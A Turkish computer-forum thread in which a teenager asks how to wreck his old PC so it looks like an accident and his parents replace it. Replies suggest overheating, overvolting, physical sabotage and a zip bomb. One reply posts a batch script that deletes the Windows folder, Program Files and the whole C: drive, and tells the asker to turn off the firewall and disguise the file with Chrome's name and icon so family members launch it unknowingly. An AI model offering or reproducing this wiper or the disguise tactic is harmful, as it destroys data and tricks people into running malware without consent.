Neler Yeni

Bilgisayarımı Bozmam Lazım

Swords

80+ Silver
Dahası  
Reaksiyon skoru
1,243
İsim
Berat Yapıcı
3-5 tane oyunu aynı anda aç büyük ihtimalle patlar sistem

Farway

80+ Silver
Bilgisayarını fansız çalıştır yada :D kablosu takılıyken fanı sök bi koku gelicektir eski olduğu için sanırsam ısı koruması tarzında şeylerde yoktur işlemci puff bununla birlikte chipsette hasar görürse tadınadn yenmez

YGT56

80+ Bronze
Dahası  
Reaksiyon skoru
207
İsim
Yiğitalp
Sen 42.zip dosyasını yükleyip pcyi babana ver zaten arka planda çalışır.Babanda ne olduğunu şaşırır.
dosyayı yükleyip direkt sağ tıklayıp klasöre çıkart mı diyeceğim?

Farway

80+ Silver
Bilgisayarını fansız çalıştır yada :D kablosu takılıyken fanı sök bi koku gelicektir eski olduğu için sanırsam ısı koruması tarzında şeylerde yoktur işlemci puff bununla birlikte chipsette hasar görürse tadınadn yenmez
Ama en iyisi dediğim gibi aile bireylerinden birisi kullanırken bi anda explorer.exe yi kapatacak bir şey yap ve resmini chrome felan yap :D

Serhat-

80+ Silver
Dahası  
Reaksiyon skoru
1,263
İsim
Serhat İsmailoğulları
Steam
steamcommunity.com/id/ByOxyGeN
Msi afterburner uyumluysa ekran kartına veya işlemciye ver voltajı sonrası cızbız

Major

80+ Bronze
Dahası  
Reaksiyon skoru
816
İsim
İsim
Merhaba, öncelikle yaralı olursam rapor kısmından yazımı en iyi mesaj olarak seçersen beni çok mutlu edersin.

BİLGİSAYARIN BUNDAN SONRA FELÇ KALACAKTIR. LÜTFEN İYİ DÜŞÜNEREK YAP. ZATEN GÖRDÜĞÜN GİBİ HEMEN GÜVENLİK DUVARI DOSYAYI TEHLİKELİ OLARAK ALGILADI. (bunları yapmadan önce güvenlik duvarını kapat.)

Dosyanın ismini chrome falan yaparsın, sonra simgesini chromenin simgesi yaparsın falan filan. yanlışlıkla tıklasınlar yeter.

@echO off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echO off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echO off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echO off
cls
cls
Echo .:: Pc ni tamirciye gönder.::.
@echO off

İYİ DÜŞÜN!!!!!!!!!!!!!!!!!

marilyn

80+ Silver
Dahası  
Reaksiyon skoru
2,673
İsim
marilyn
pc ler kolay kolay bozulmuyor bende hala windows 98 yüklü pc var experin şu ten rengi kasalarından yanında logitech mous hediye ediyorlardı hatta

YGT56

80+ Bronze
Dahası  
Reaksiyon skoru
207
İsim
Yiğitalp
OCCT+furmark yaparsam bozulur mu?

¥usuff

80+ Silver
2006'dan kalma külüstür bir bilgisayarım var aileme ne zaman yenileyelim desem sınavlar geçsin iyi not al yenileyeceğiz diyorlardı ben sınavdan başarıyla geçtim fakat bilgisayar almadılar nedenini sorduğumda ise hali hazırda taş gibi bilgisayarın var bozulana kadar kullan dediler tabi ben kafayı yedim sonra aklıma bir fikir geldi bilgisayarı kendim bozmak çünkü bu bozulmuyor ve hala 10 senesi var muhtemelen neyse ben virüs dosyası kurup kendim bozsam beni suçlarlar o yüzden bu seçenek olmaz ailenin herhangi bir ferdi kullanırken bir anda bozulmalı ve kaza süsü verilmeli yada onlar yanlışlıkla virüse tıklamalı ve bilgisayar anında gitmeli yavaş yavaş olmaz ama anında bana yardım edebilecek var mı?(acil)
virus kur en az 30 tane
sonra işlemci yi çikar delid yap pıçak sok
veya pinleri yamult kır kırdıktan sonra altında bi sarı beyaz bir yer olucak orayıda çıkar
hdd yi aç çiz ustunu
anakart çipseti çiz
ramin altındaki şeylerdeni birini kır yada ramin çipini pıçakla sök
ekran kartı da ısıt iyce 100 110 olsun sonra bi anda 0 derece ye sok
artık kimse bu sistemi çalıştıramaz.

• Hahaha
Reaksiyonlar: RefX
Yeni mesajlar Yeni Konu Aç      

SON KONULAR

Forum istatistikleri

Konular
989,223